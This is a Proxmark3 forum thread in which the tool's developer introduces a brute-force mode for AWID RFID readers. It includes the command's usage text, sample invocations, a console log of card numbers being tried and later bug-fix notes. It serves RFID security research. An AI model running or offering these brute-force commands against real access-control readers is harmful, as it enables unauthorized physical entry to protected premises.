Proxmark3 community
Research, development and trades concerning the powerful Proxmark3 device.
Remember; sharing is caring. Bring something back to the community.
"Learn the tools of the trade the hard way." +Fravia
You are not logged in.
Announcement
Time changes and with it the technology
Proxmark3 @ discord
Users of this forum, please be aware that information stored on this site is not private.
Pages: 1
#1 2015-12-14 22:39:05
- iceman
- Administrator
- Registered: 2013-04-25
- Posts: 9,537
- Website
LF AWID BRUTEFORCE
I got at bit tired of things this evening, and added a bruteforce mode for the LF AWID commands.
it is a simple bruteforce, which takes a facility-code and iterates all possible 16bit card-nums.
which it sends to the device as a sim command (lf awid sim)
When aborted by the keyboard, it sends another usb command, which the loops on the device side should pick up and stop the current simulation.
However I don't have a awid reader to test it on.
[edit] added delay, cardnumber parameter
pm3 --> lf awid
help This help
fskdemod Realtime AWID FSK demodulator
sim AWID tag simulator
clone Clone AWID to T55x7
brute Bruteforce card number against reader
pm3 --> lf awid brute h
Enables bruteforce of AWID reader with specified facility-code.
This is a attack against reader. if cardnumber is given, it starts with it and goes up / down one step
if cardnumber is not given, it starts with 1 and goes up to 65535
Usage: lf awid brute [h] a <format> f <facility-code> c <cardnumber> d <delay>
Options:
h : This help
a <format> : format length 26|50
f <facility-code> : 8|16bit value facility code
c <cardnumber> : (optional) cardnumber to start with, max 65535
d <delay> : delay betweens attempts in ms. Default 1000ms
Samples:
lf awid brute a 26 f 224
lf awid brute a 50 f 2001 d 2000
lf awid brute a 50 f 2001 c 200 d 2000pm3 --> lf aw bru a 26 f 245
Bruteforceing AWID26
Press pm3-button to abort simulation or run another command
Trying FC: 245; CN: 1
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4794
Trying FC: 245; CN: 2
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4794
Trying FC: 245; CN: 3
Trying FC: 245; CN: 4
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4794
Trying FC: 245; CN: 5
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4798
Trying FC: 245; CN: 6
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4798
Trying FC: 245; CN: 7
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4798
Trying FC: 245; CN: 8
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4794
Trying FC: 245; CN: 9
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4794
Trying FC: 245; CN: 10
#db# Stopped
#db# Simulating with fcHigh: 10, fcLow: 8, clk: 50, invert: 0, n: 4794Last edited by iceman (2015-12-14 22:44:56)
Offline
#2 2015-12-15 15:30:28
- Danz
- Contributor
- From: Dubai
- Registered: 2015-10-24
- Posts: 98
Re: LF AWID BRUTEFORCE
Great work, I will test out if I got my hands on awid access system 
Offline
#3 2016-08-09 08:34:05
- iceman
- Administrator
- Registered: 2013-04-25
- Posts: 9,537
- Website
Re: LF AWID BRUTEFORCE
after some chats with @crayon yesterday, where the suggestion of adding a variable delay instead of the fixed 1second.
The command also had a bug with parsing the stringlen check was too strict 
I'm still having problems with the deviceside, it doesn't receive all new sim commands nor the ping command to cancel inside the loop , ref: https://github.com/iceman1001/proxmark3 … ops.c#L401
Suggestions on how to fix it would be appreciated.
Also added the possibility to give a cardnumber, if given the loop uses it and start checking one up/down until it reaches 0 and 65535.
Offline
Pages: 1